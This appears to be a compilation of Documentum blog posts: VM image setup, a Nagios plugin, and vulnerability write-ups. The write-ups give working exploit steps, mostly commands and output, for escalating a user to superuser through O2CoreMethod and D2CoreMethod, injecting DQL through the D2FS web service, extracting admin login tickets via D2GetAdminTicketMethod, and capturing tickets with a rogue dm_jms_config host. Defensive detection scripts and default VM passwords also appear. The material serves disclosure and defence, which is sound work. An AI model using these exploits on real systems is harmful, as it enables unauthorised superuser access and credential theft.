PostgreSQL DEV image available

ftp://ftp2.lss.emc.com/Hotfixes/postgress/Image-Postgres/ (the credentials can be found in the CS6.7SP1/7.0 patch notes; Google is also your friend).

This VM image has a Postgres database, Documentum Content Server, a Postgres-based pre-configured repository (MyRepo),
DA and RESTful services deployed on an apache-tomcat server.

Steps to use the VM player for running the VM image
=======================================================

1. Extract the CentOSPostgres18Feb.rar file using WinRAR.

This rar file contains:
-CentOSPostgres20Feb14.mf
-CentOSPostgres20Feb14.ovf
-CentOSPostgres20Feb14-disk1.vmdk
-ReadMe.txt
-Documentum Reference Guides: Reference guides related to Documentum

2. Download and install VMware Player 6.0.1 or any other VM player which supports the OVF format.

3. Once VMware Player is running, launch the VM by selecting the *.ovf file.

4. If the host CPU is Intel 64-bit, you may encounter an error regarding Intel VT-x being disabled on the machine;
   reboot the machine, go to the BIOS settings and, under CPU settings, enable the Intel Virtualization preference.

5. Once the VM image is up and running, log in with the dmadmin/password credentials.

6. Once you have logged in to the VM, refer to the readme in the $HOME directory.

7. The root user password for the VM image is password.

UPDATE

The download address has been changed; the new address is ftp://ftp2.lss.emc.com/dev_out/Image-Postgres/

documentum security vulnerabilities: more deep dive in D2

To be honest, it took some time to hack D2GetAdminTicketMethod in 4.2 release, but that time was not wasted at all – now I know that D2 is a pretty big security hole 🙂

O2CoreMethod

Allows any DQL statement to be executed with superuser privileges (although the length of the statement cannot exceed 250 characters):

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
0
API> create,c,dm_job
...
08002f0a80005dbc
API> append,c,l,method_arguments
SET> -dql update dm_user object set user_privileges=16 where user_name='hacker'
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='O2CoreMethod', 
    arguments='-docbase_name d242 -password "" -job_id 08002f0a80005dbc -transaction false'
...

[DM_API_E_BADATTRNAME]error:  "Bad attribute name 'r_object_id' for document/object."
(1 row affected)

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
16

D2FS WebService

I have no idea whether the D2 web interface allows users to execute DQL statements or not (for example, in the latest Webtop release EMC restricted access to the DQL Editor component due to a lot of security issues described in this blog), but the D2FS WebService does.

Unsuccessful attempt to create object through d2fs:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
           xmlns:con="http://www.emc.com/d2fs/services/content_service" 
           xmlns:com="http://www.emc.com/d2fs/models/common" 
           xmlns:con1="http://www.emc.com/d2fs/models/context">
    <soapenv:Header/>
    <soapenv:Body>
        <con:getDQLContentRequest com:id="2" 
                   dql="create dm_document object set object_name='test'">
            <con1:context uid="1" login="hacker" password="hacker">
                <con1:repository com:id="1" repositoryName="d242" serverVersion="7" 
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
        </con:getDQLContentRequest>
    </soapenv:Body>
</soapenv:Envelope>


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <soapenv:Fault>
            <faultcode>soapenv:Server</faultcode>
            <faultstring xml:lang="en">Exception Service</faultstring>
            <detail>
                <faultDocument target="IllegalStateException" 
                               reason="No match found" code="D2-SERVICE-ERR" 
                               xmlns="http://www.emc.com/d2fs/exceptions">
                    ......................................
                               </faultDocument>
            </detail>
        </soapenv:Fault>
    </soapenv:Body>
</soapenv:Envelope>

Workaround (note "; union" at the end of the query):

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
                  xmlns:con="http://www.emc.com/d2fs/services/content_service" 
                  xmlns:com="http://www.emc.com/d2fs/models/common" 
                  xmlns:con1="http://www.emc.com/d2fs/models/context">
    <soapenv:Header/>
    <soapenv:Body>
        <con:getDQLContentRequest com:id="2" 
                dql="create dm_document object set object_name='test'; union ">
            <con1:context uid="1" login="hacker" password="hacker">
                <con1:repository com:id="1" repositoryName="d242" serverVersion="7" 
                    repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
        </con:getDQLContentRequest>
    </soapenv:Body>
</soapenv:Envelope>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <ns17:getDQLContentResponse 
                     xmlns:ns17="http://www.emc.com/d2fs/services/content_service"
                     xmlns="http://www.emc.com/d2fs/exceptions"
                     xmlns:ns18="http://www.emc.com/d2fs/models/item"
                     xmlns:ns3="http://www.emc.com/d2fs/models/common">
            <ns18:docItems>
                <ns18:upperItem children="false" immutable="false" 
                         selected="false" type="DQL" ns3:id="2"/>
                <ns18:items children="false" immutable="false" 
                         selected="false" ns3:id="0000000000000000"/>
            </ns18:docItems>
        </ns17:getDQLContentResponse>
    </soapenv:Body>
</soapenv:Envelope>
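One way to screen D2FS traffic for the pattern shown above, at a reverse proxy or over captured request bodies, is to accept only a single SELECT in the `dql` attribute of `getDQLContentRequest`. This is an added example, not code from D2 or from the original post; the function names and the constructed sample request are assumptions.

```python
import re
import xml.etree.ElementTree as ET

CONTENT_NS = "http://www.emc.com/d2fs/services/content_service"
CONTEXT_NS = "http://www.emc.com/d2fs/models/context"


def strip_literals(dql):
    """Blank out quoted strings so a ';' inside a literal is not counted."""
    return re.sub(r"'(?:[^']|'')*'", "''", dql)


def review_d2fs_request(soap_xml):
    """Return one finding per getDQLContentRequest that is not a single SELECT."""
    findings = []
    # Assumption: the caller caps the body size before parsing untrusted XML.
    root = ET.fromstring(soap_xml)
    for req in root.iter("{%s}getDQLContentRequest" % CONTENT_NS):
        dql = req.get("dql", "")
        ctx = req.find("{%s}context" % CONTEXT_NS)
        reasons = []
        if not re.match(r"\s*select\b", dql, re.IGNORECASE):
            reasons.append("not a SELECT")
        if ";" in strip_literals(dql):
            reasons.append("statement separator")
        if reasons:
            findings.append({
                "login": ctx.get("login") if ctx is not None else None,
                "dql": dql,
                "reasons": reasons,
            })
    return findings


def sample_request(dql):
    """Constructed request in the shape shown above (password omitted)."""
    return (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:con="%s" xmlns:con1="%s"><soapenv:Body>'
        '<con:getDQLContentRequest dql="%s">'
        '<con1:context uid="1" login="hacker"/>'
        '</con:getDQLContentRequest></soapenv:Body></soapenv:Envelope>'
    ) % (CONTENT_NS, CONTEXT_NS, dql)


if __name__ == "__main__":
    for q in ("create dm_document object set object_name='test'; union ",
              "select object_name from dm_document where title='a;b'"):
        print(q, "->", review_d2fs_request(sample_request(q)))
```
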

D2CoreMethod

Has the same problem as O2CoreMethod but does not require creating a dm_job object:

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
0
API> ?,c,execute do_method with method='D2CoreMethod', 
   arguments='-docbase_name d242 -password "" 
   -dql_filter "update dm_user object set user_privileges=16 where user_name=''hacker''"'
...

[DM_API_E_BADATTRNAME]error:  "Bad attribute name 'r_object_id' for document/object."
(1 row affected)

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
16

God bless EMC. Part IV

Previously I had written about a security vulnerability in D2's D2GetAdminTicketMethod method. Starting from the 4.2 release, EMC changed the behavior of D2 methods: D2 now encrypts the method arguments and the return value passed through the c6_method_return object:

1> create c6_method_return object set message='test'
2> go
object_created
----------------
00002f0a8000291d
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global -timeout 3600'
4> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002f0a8000291d'
2> go
message
----------------------------------------------------------------------------
AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2
hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b
aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+
44/DdBkvmi6A5v7+wF5+b0wR3saQFhxTX7Rfu/vVVFfvEehYAJNvDAvd/vtWvpJa+6N3Zmz+SZgH
q6x59int5a8CmSXhrZiflwcs+psMaOcStVyY/lYZGrGMdY4y9eEqn1psnQ+azA0cmfRZfn7uJJbc
KJmARVgaPFZN4FbEdbeu94PrNUU/lQrtKs+NaiwColY/WYEY8MlzkZhQ249koCHqgd07/TLdAX6l
9xCtvyIJf7cQeSi/4Xl4NlQ92O5RRFwPxIdHz0dhwSxnVptqGoRqMTcpw/NTJ5ldA5ZrhRnudAhi
iUt2b3PP0UBjVUjnpA9QD5sLR2DxUX4ysUbI2MDoYlzcnL5MYWLvEqq3K6gPXA8YJAgUwIIYbDqo
rXZEtet2cAl5zKCgDAqL6AqIPzcFn1sIDqy6p72D1kvQF4iFs2oQJZAT55j+C6SGcm4DoJYskpGg
/AwBiE0YFQX2zqjwqbSPcGSoIZDmoPZFELGjySl0xxjWcwW5HXh7194j73FW2FV82cMNZVIyf2/f
gWRMt+rw315VhwORReJYfMhibTBHR+CC+ySOetT7xvEMBVarfEOUHqGvs9hLZWYhgpBa2EgBKUZQ
jFBRe2SmK1E0aR7hmS1zbdATDJJGNhP9PrDLaHelunjgawEoAoMilY51EPgwqI2MuA==
(1 row affected)

So, now we are getting some garbage instead of a ticket.

Is it possible to decrypt that garbage?
YES! Note how the encrypted password is passed as an integer argument (timeout) and D2 says that it's not an integer:

1> update c6_method_return object
2> set parameter_name[0]='-timeout',
3> set parameter_value[0]=(select message from c6_method_return
4> where r_object_id='00002f0a8000291d')
5> where r_object_id='00002f0a8000291d'
6> go
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."

1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global'
4> go
...
(1 row affected)

1> select error from c6_method_return where r_object_id='00002f0a8000291d'
2> go
error
----------------------------------------------------------------------------
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ
(1 row affected)

Nagios plugin for Documentum

This post is a bit outdated; please check Q & A. VIII for the complete description.

Installation:

 ~]# easy_install argparse nagiosplugin dctmpy
Searching for argparse
Reading http://pypi.python.org/simple/argparse/
Best match: argparse 1.2.1
Downloading http://argparse.googlecode.com/files/....
Processing argparse-1.2.1.tar.gz
Running argparse-1.2.1/setup.py -q bdist_egg ...
Adding argparse 1.2.1 to easy-install.pth file

Installed /usr/lib/python2.6/site-packages/argparse-1.2.1-py2.6.egg
Processing dependencies for argparse
Finished processing dependencies for argparse
Searching for nagiosplugin
Reading http://pypi.python.org/simple/nagiosplugin/
Best match: nagiosplugin 1.2
Downloading https://pypi.python.org/packages/....
Processing nagiosplugin-1.2.zip
Running nagiosplugin-1.2/setup.py -q bdist_egg ...
Adding nagiosplugin 1.2 to easy-install.pth file

Installed /usr/lib/python2.6/site-packages/nagiosplugin-1.2-py2.6.egg
Processing dependencies for nagiosplugin
Finished processing dependencies for nagiosplugin
Searching for dctmpy
Reading http://pypi.python.org/simple/dctmpy/
Best match: dctmpy 0.1.2
Downloading https://pypi.python.org/packages/....
Processing dctmpy-0.1.2.tar.gz
Running dctmpy-0.1.2/setup.py -q bdist_egg ...
Adding dctmpy 0.1.2 to easy-install.pth file
Installing nagios_check_docbase script to /usr/bin
Installing nagios_check_docbroker script to /usr/bin

Installed /usr/lib/python2.6/site-packages/dctmpy-0.1.2-py2.6.egg
Processing dependencies for dctmpy
Finished processing dependencies for dctmpy

Check session creation:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
        -m login
LOGIN OK

Check session count:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
       -m sessioncount -w 70 -c 80
SESSIONCOUNT OK - sessioncount is 8
| sessioncount=8;70;80;0;100

Check projection targets:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
       -m targets
TARGETS OK - ssc_dev.ssc_dev has status Open on 192.168.2.56:1489

Check JMS status:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
       -m jmsstatus
JMSSTATUS OK - JMS docu70dev01.sinera.remote:9080 for ssc_dev.ssc_dev - OK

Check failed auto-activities:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
       -m failedtasks
FAILEDTASKS CRITICAL - 1 task(s): 'Last Performer' (tp002-000_user1)

Check job scheduling:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
     -m jobs -j "dm_DMFilescan,dm_LogPurge" -n system_clenup_jobs
SYSTEM_CLENUP_JOBS CRITICAL - dm_DMFilescan is inactive, dm_LogPurge is inactive

Check indexagent status:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
     -m indexagents
INDEXAGENTS WARNING - Indexagent ssc_dev_ftindex_01/docu70dev01_9200_IndexAgent is stopped

Check fulltext indexing queue:

 ~]$ nagios_check_docbase -H 192.168.2.56:12000/131031 -l dmadmin -a dmadmin \
     -m indexqueue -w 1000 -c 2000
INDEXQUEUE CRITICAL - _fulltext_index_user is 4.978e+04 (outside range 0:2000)
| _fulltext_index_user=49781;1000;2000;0

documentum security vulnerabilities: JMS HA feature

In the Documentum 6.6 release EMC introduced a high-availability feature for JMS:

and now any user is able to create a dm_jms_config object pointing to a malicious HTTP server and catch login tickets:

create dm_jms_config object 
set object_name='malicious JMS config',
set config_type=2,
append server_config_id=(select r_object_id from dm_server_config),
append servlet_name='do_bpm',
append base_uri='http://malicious_host:port/....',
append supported_protocol='http',
append projection_enable=TRUE,
append projection_proximity_value=1,
append projection_targets='malicious_host',
append projection_ports=0
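
A periodic audit can catch such objects: export every dm_jms_config row and flag any whose base_uri or projection_targets fall outside the hosts that really run JMS, or whose owner is not an administrator. This is an added example, not code from the original post or from EMC; the allowlists and sample rows are constructed, and owner_name is assumed to be available on dm_jms_config as on other sysobjects.

```python
from urllib.parse import urlsplit


def audit_jms_configs(rows, approved_hosts, approved_owners):
    """Flag dm_jms_config rows that point outside the approved JMS hosts.

    rows: dicts exported from the repository, repeating attributes as lists.
    """
    approved_hosts = {h.lower() for h in approved_hosts}
    findings = []
    for row in rows:
        reasons = []
        owner = row.get("owner_name")  # assumption: exported with each row
        if owner not in approved_owners:
            reasons.append("owner %s is not an approved administrator" % owner)
        for uri in row.get("base_uri", []):
            host = (urlsplit(uri).hostname or "").lower()
            if host not in approved_hosts:
                reasons.append("base_uri host %s is not approved" % (host or "<none>"))
        for target in row.get("projection_targets", []):
            if target.lower() not in approved_hosts:
                reasons.append("projection target %s is not approved" % target)
        if reasons:
            findings.append((row["r_object_id"], row["object_name"], reasons))
    return findings


# Constructed rows; object ids, host names and URI paths are placeholders.
SAMPLE_ROWS = [
    {"r_object_id": "<id-1>", "object_name": "JMS on jms01",
     "owner_name": "dmadmin",
     "base_uri": ["http://jms01.example.internal:9080/placeholder"],
     "projection_targets": ["jms01.example.internal"]},
    {"r_object_id": "<id-2>", "object_name": "malicious JMS config",
     "owner_name": "hacker",
     "base_uri": ["http://rogue.example.net:8080/placeholder"],
     "projection_targets": ["rogue.example.net"]},
]

if __name__ == "__main__":
    for oid, name, reasons in audit_jms_configs(
            SAMPLE_ROWS, {"jms01.example.internal"}, {"dmadmin"}):
        print(oid, name, "; ".join(reasons))
```
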